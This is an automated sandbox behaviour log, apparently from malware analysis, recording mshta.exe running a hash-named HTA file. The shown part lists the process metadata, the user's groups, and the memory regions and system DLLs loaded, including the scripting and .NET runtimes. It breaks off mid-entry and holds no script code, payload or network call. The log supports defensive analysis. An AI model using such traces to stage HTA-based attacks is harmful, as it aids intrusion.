# Flog Txt Version 1 # Analyzer Version: 4.4.0 # Analyzer Build Date: Dec 8 2021 20:04:45 # Log Creation Date: 15.01.2022 10:04:57.836 Process: id = "1" image_name = "mshta.exe" filename = "c:\\windows\\system32\\mshta.exe" page_root = "0x487d4000" os_pid = "0xf10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x390" cmd_line = "\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 115 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 116 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 117 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 118 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 119 start_va = 0xff7a0000 end_va = 0xff7affff monitored = 1 entry_point = 0xff7a2c24 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe") Region: id = 120 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 121 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 122 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 123 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 263 start_va = 0x3f0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 264 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 265 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 266 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 267 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 268 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 269 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 270 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 271 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 272 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 273 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 274 start_va = 0x4f0000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 275 start_va = 0xc0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 276 start_va = 0x4f0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 277 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 278 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 279 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 280 start_va = 0x7feef840000 end_va = 0x7fef00d7fff monitored = 1 entry_point = 0x7feef8454c0 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 281 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 282 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 283 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 284 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 285 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 286 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 287 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 288 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 289 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 290 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 291 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 292 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 293 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 294 start_va = 0x7fef88e0000 end_va = 0x7fef891afff monitored = 0 entry_point = 0x7fef88e1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 295 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 296 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 297 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 298 start_va = 0x1c0000 end_va = 0x1e8fff monitored = 0 entry_point = 0x1c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 299 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 300 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 301 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 302 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 303 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui") Region: id = 304 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 305 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 306 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 307 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 308 start_va = 0x1f70000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 309 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 310 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 311 start_va = 0x310000 end_va = 0x38cfff monitored = 0 entry_point = 0x31cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 312 start_va = 0x310000 end_va = 0x38cfff monitored = 0 entry_point = 0x31cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 313 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 314 start_va = 0x2070000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 315 start_va = 0x310000 end_va = 0x3eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 316 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 317 start_va = 0x22b0000 end_va = 0x257efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 318 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 319 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 320 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 321 start_va = 0x600000 end_va = 0x600fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 322 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 323 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 324 start_va = 0x600000 end_va = 0x600fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 325 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 326 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 327 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 328 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 329 start_va = 0x630000 end_va = 0x630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 330 start_va = 0x1db0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 331 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 332 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 333 start_va = 0x7fef91b0000 end_va = 0x7fef91bdfff monitored = 0 entry_point = 0x7fef91b1070 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 334 start_va = 0x1df0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 335 start_va = 0x2070000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 336 start_va = 0x2230000 end_va = 0x22affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 337 start_va = 0x7fef32b0000 end_va = 0x7fef3303fff monitored = 0 entry_point = 0x7fef32b104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 338 start_va = 0x640000 end_va = 0x640fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 339 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 340 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 341 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 342 start_va = 0x1ef0000 end_va = 0x1f34fff monitored = 0 entry_point = 0x1ef1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 343 start_va = 0x1ef0000 end_va = 0x1f34fff monitored = 0 entry_point = 0x1ef1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 344 start_va = 0x1ef0000 end_va = 0x1f34fff monitored = 0 entry_point = 0x1ef1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 345 start_va = 0x1ef0000 end_va = 0x1f34fff monitored = 0 entry_point = 0x1ef1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 346 start_va = 0x1ef0000 end_va = 0x1f34fff monitored = 0 entry_point = 0x1ef1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 347 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 348 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 349 start_va = 0x2910000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 350 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 351 start_va = 0x2b20000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 352 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 353 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 354 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 355 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 356 start_va = 0x660000 end_va = 0x660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 357 start_va = 0x7fef3310000 end_va = 0x7fef3ec6fff monitored = 0 entry_point = 0x7fef3311bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 358 start_va = 0x660000 end_va = 0x661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 359 start_va = 0x2c20000 end_va = 0x2d4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 360 start_va = 0x2d50000 end_va = 0x2f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 361 start_va = 0x7fef1ea0000 end_va = 0x7fef1f39fff monitored = 1 entry_point = 0x7fef1eae1b8 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll") Region: id = 362 start_va = 0x2f50000 end_va = 0x314ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 363 start_va = 0x2a10000 end_va = 0x2b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 364 start_va = 0x3150000 end_va = 0x326efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 365 start_va = 0x7fef1e30000 end_va = 0x7fef1e9efff monitored = 1 entry_point = 0x7fef1e31134 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 366 start_va = 0x2680000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 367 start_va = 0x2a10000 end_va = 0x2b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 368 start_va = 0x3270000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 369 start_va = 0x7fef1920000 end_va = 0x7fef19c8fff monitored = 1 entry_point = 0x7fef1921010 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 370 start_va = 0x7fefa990000 end_va = 0x7fefa992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 371 start_va = 0x670000 end_va = 0x67afff monitored = 1 entry_point = 0x672c24 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe") Region: id = 372 start_va = 0x7feeeea0000 end_va = 0x7feef83cfff monitored = 1 entry_point = 0x7feef2ea300 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 373 start_va = 0x7feee500000 end_va = 0x7feeee9cfff monitored = 1 entry_point = 0x7feee94a300 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 374 start_va = 0x3410000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 375 start_va = 0x7feeeea0000 end_va = 0x7feef83cfff monitored = 1 entry_point = 0x7feef2ea300 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 376 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 377 start_va = 0x74d80000 end_va = 0x74e48fff monitored = 0 entry_point = 0x74d82df0 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll") Region: id = 378 start_va = 0x1ef0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 379 start_va = 0x3270000 end_va = 0x336ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 380 start_va = 0x3390000 end_va = 0x340ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 381 start_va = 0x1ef0000 end_va = 0x1ef2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 382 start_va = 0x1f10000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 383 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f00000" filename = "" Region: id = 384 start_va = 0x1f20000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 385 start_va = 0x7ff00030000 end_va = 0x7ff0003ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00030000" filename = "" Region: id = 386 start_va = 0x7ff00040000 end_va = 0x7ff0004ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00040000" filename = "" Region: id = 387 start_va = 0x7ff00050000 end_va = 0x7ff000effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00050000" filename = "" Region: id = 388 start_va = 0x7ff000f0000 end_va = 0x7ff000fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff000f0000" filename = "" Region: id = 389 start_va = 0x7ff00100000 end_va = 0x7ff0016ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007ff00100000" filename = "" Region: id = 390 start_va = 0x3450000 end_va 